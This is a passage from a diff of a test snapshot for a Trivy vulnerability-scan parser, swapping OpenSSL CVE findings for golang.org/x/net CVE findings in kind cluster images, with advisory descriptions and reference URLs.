"https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "https://pkg.go.dev/vuln/GO-2022-0288", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220121-0002/", + "https://www.cve.org/CVERecord?id=CVE-2021-44716", + ], + }, + "category": "Vulnerability", + "description": "net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "golang: net/http: limit growth of header canonicalization cache", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0778", + "value": "https://avd.aquasec.com/nvd/cve-2021-44716", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2062202", + "value": "https://access.redhat.com/security/cve/CVE-2021-44716", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", + "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2022-5326.html", + "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:4899", + "value": "https://github.com/golang/go/issues/50058", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", + "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", + "value": "https://go.dev/cl/369794", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", + "value": "https://go.dev/issue/50058", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", + "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-0778.html", + "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9272.html", + "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", + "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", + "value": "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", + "value": "https://pkg.go.dev/vuln/GO-2022-0288", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", + "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", + "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27664", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2357", + "https://access.redhat.com/security/cve/CVE-2022-27664", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2113814", + "https://bugzilla.redhat.com/2124669", + "https://bugzilla.redhat.com/2132868", + "https://bugzilla.redhat.com/2132872", + "https://bugzilla.redhat.com/2161274", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "https://errata.rockylinux.org/RLSA-2022:7129", + "https://github.com/advisories/GHSA-69cg-p879-7622", + "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "https://github.com/golang/go/issues/54658", + "https://go.dev/cl/428735", + "https://go.dev/issue/54658", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-27664.html", + "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "https://pkg.go.dev/vuln/GO-2022-0969", + "https://security.gentoo.org/glsa/202209-26", + "https://security.netapp.com/advisory/ntap-20220923-0004/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-27664", + ], + }, + "category": "Vulnerability", + "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "handle server errors after sending GOAWAY", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220321-0002/", + "value": "https://avd.aquasec.com/nvd/cve-2022-27664", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220429-0005/", + "value": "https://access.redhat.com/errata/RHSA-2023:2357", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213255", + "value": "https://access.redhat.com/security/cve/CVE-2022-27664", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213256", + "value": "https://bugzilla.redhat.com/2107371", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213257", + "value": "https://bugzilla.redhat.com/2107374", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5328-1", + "value": "https://bugzilla.redhat.com/2107383", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5328-2", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0778", + "value": "https://bugzilla.redhat.com/2107388", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5103", + "value": "https://bugzilla.redhat.com/2113814", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220315.txt", + "value": "https://bugzilla.redhat.com/2124669", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://bugzilla.redhat.com/2132868", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://bugzilla.redhat.com/2132872", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-06", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-07", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-08", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-09", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb10u4", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4450", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2022-4450", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", - "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", - "https://linux.oracle.com/cve/CVE-2022-4450.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", - "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4450", - "https://www.openssl.org/news/secadv/20230207.txt", - ], - }, - "category": "Vulnerability", - "description": "The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and decodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data. If the function succeeds then the "name_out", "header" and "data" arguments are populated with pointers to buffers containing the relevant decoded data. The caller is responsible for freeing those buffers. It is possible to construct a PEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex() will return a failure code but will populate the header argument with a pointer to a buffer that has already been freed. If the caller also frees this buffer then a double free will occur. This will most likely lead to a crash. This could be exploited by an attacker who has the ability to supply malicious PEM files for parsing to achieve a denial of service attack. The functions PEM_read_bio() and PEM_read() are simple wrappers around PEM_read_bio_ex() and therefore these functions are also directly affected. These functions are also called indirectly by a number of other OpenSSL functions including PEM_X509_INFO_read_bio_ex() and SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal uses of these functions are not vulnerable because the caller does not free the header argument if PEM_read_bio_ex() returns a failure code. These locations include the PEM_read_bio_TYPE() functions as well as the decoders introduced in OpenSSL 3.0. The OpenSSL asn1parse command line application is also impacted by this issue.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "double free after calling PEM_read_bio_ex", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4450", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4450", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "https://errata.rockylinux.org/RLSA-2022:7129", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://github.com/advisories/GHSA-69cg-p879-7622", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://github.com/golang/go/issues/54658", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://go.dev/cl/428735", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://go.dev/issue/54658", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://pkg.go.dev/vuln/GO-2022-0969", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://security.gentoo.org/glsa/202209-26", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.7.0", + "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41723", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-41723", + "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "https://go.dev/cl/468135", + "https://go.dev/cl/468295", + "https://go.dev/issue/57855", + "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "https://pkg.go.dev/vuln/GO-2023-1571", + "https://vuln.go.dev/ID/GO-2023-1571.json", + "https://www.cve.org/CVERecord?id=CVE-2022-41723", + ], + }, + "category": "Vulnerability", + "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "avoid quadratic complexity in HPACK decoding", + "references": [ { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://avd.aquasec.com/nvd/cve-2022-41723", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", + "value": "https://access.redhat.com/security/cve/CVE-2022-41723", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", + "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", + "value": "https://go.dev/cl/468135", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4450.html", + "value": "https://go.dev/cl/468295", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "https://go.dev/issue/57855", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", + "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4450", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2023-1571", + }, + { + "type": "URL", + "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u4", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0215", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", + "fixedVersion": "0.4.0", + "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41717", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2023-0215", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", - "https://github.com/advisories/GHSA-r7jw-wp68-3xch", - "https://linux.oracle.com/cve/CVE-2023-0215.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", - "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", - "https://security.netapp.com/advisory/ntap-20230427-0007/", - "https://security.netapp.com/advisory/ntap-20230427-0009/", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://ubuntu.com/security/notices/USN-5845-1", - "https://ubuntu.com/security/notices/USN-5845-2", - "https://www.cve.org/CVERecord?id=CVE-2023-0215", - "https://www.openssl.org/news/secadv/20230207.txt", + "https://access.redhat.com/errata/RHSA-2023:2367", + "https://access.redhat.com/security/cve/CVE-2022-41717", + "https://bugzilla.redhat.com/2092793", + "https://bugzilla.redhat.com/2161274", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "https://go.dev/cl/455635", + "https://go.dev/cl/455717", + "https://go.dev/issue/56350", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-41717.html", + "https://linux.oracle.com/errata/ELSA-2023-2866.html", + 